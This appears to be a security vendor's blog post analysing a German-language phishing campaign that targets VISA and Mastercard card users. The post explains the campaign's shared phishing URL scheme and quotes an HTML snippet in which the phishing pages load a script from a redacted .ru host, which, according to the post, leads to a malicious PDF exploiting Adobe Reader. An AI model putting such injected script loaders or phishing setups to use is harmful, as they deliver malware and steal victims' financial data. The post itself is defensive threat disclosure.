Creditcard multiphishing with malware

We have started to see a new phishing method in the wild.

It is the first time that we see that a single email contains two phishing URLs, targeting two financial institutions: VISA and Mastercard. Even more, the email is targeted to the German speaking credit card users, as it is being written in German only (at the moment of writing this article).

The email is very well crafted though the German used isn’t the best, and is being sent in HTML form (with a plain text part, too). The email appears to be sent from a legitimate company called CCRD Operating Company, Inc. which owns the domains CreditCard.com and CreditCards.com. In reality, the email is sent from a bot running on an infected computer having a dynamic IP address.

The URLs and the Websites

The target URLs are having a special format: http://host1/ verification/?page=mastercard_de and http://host2/ verification/?page=visa _de. The two hosts work with both tags, so if you interchange mastercard_de with visa_de, you will be redirected to the “correct” fake website. This phishing operation is using multiphishing also in the back-end, having one web application serving more than one website.

In the bottom of the page there are some links which can’t be visited unless all information in the form are correctly filled.

The Mastercard fake website is built similar to the VISA one, another sign that we have to deal with a multiphishing operation:

The links at the bottom of the Mastercard phishing page have the same functionality as on the other website: prevent the user to visit the pages unless it fills out all information in the form.

The catch

Yes, there is also a catch. The websites are also distributing malware when they aren’t distributing phishing. When the parameters are removed, there is a special content distributed through a specially crafted page:

<body>
<div id="centro">
</div>
</body>
</html>
<script type="text/javascript" src="http://XXXXX.ru/Firewall.js"></script>
<!--ccea939cf584bc8abd8b2dd28b5b7b13-->

When opened, the page automatically opens a PDF document which AntiVir detects as EXP/Pidief.cjd , which is trying to exploit some bugs in the Adobe Reader installed on the computer. Avira detects the phishing websites and the email as spam, and Guard detects the malware dropped by the PDF.

Sorin Mustaca
Manager International Software Development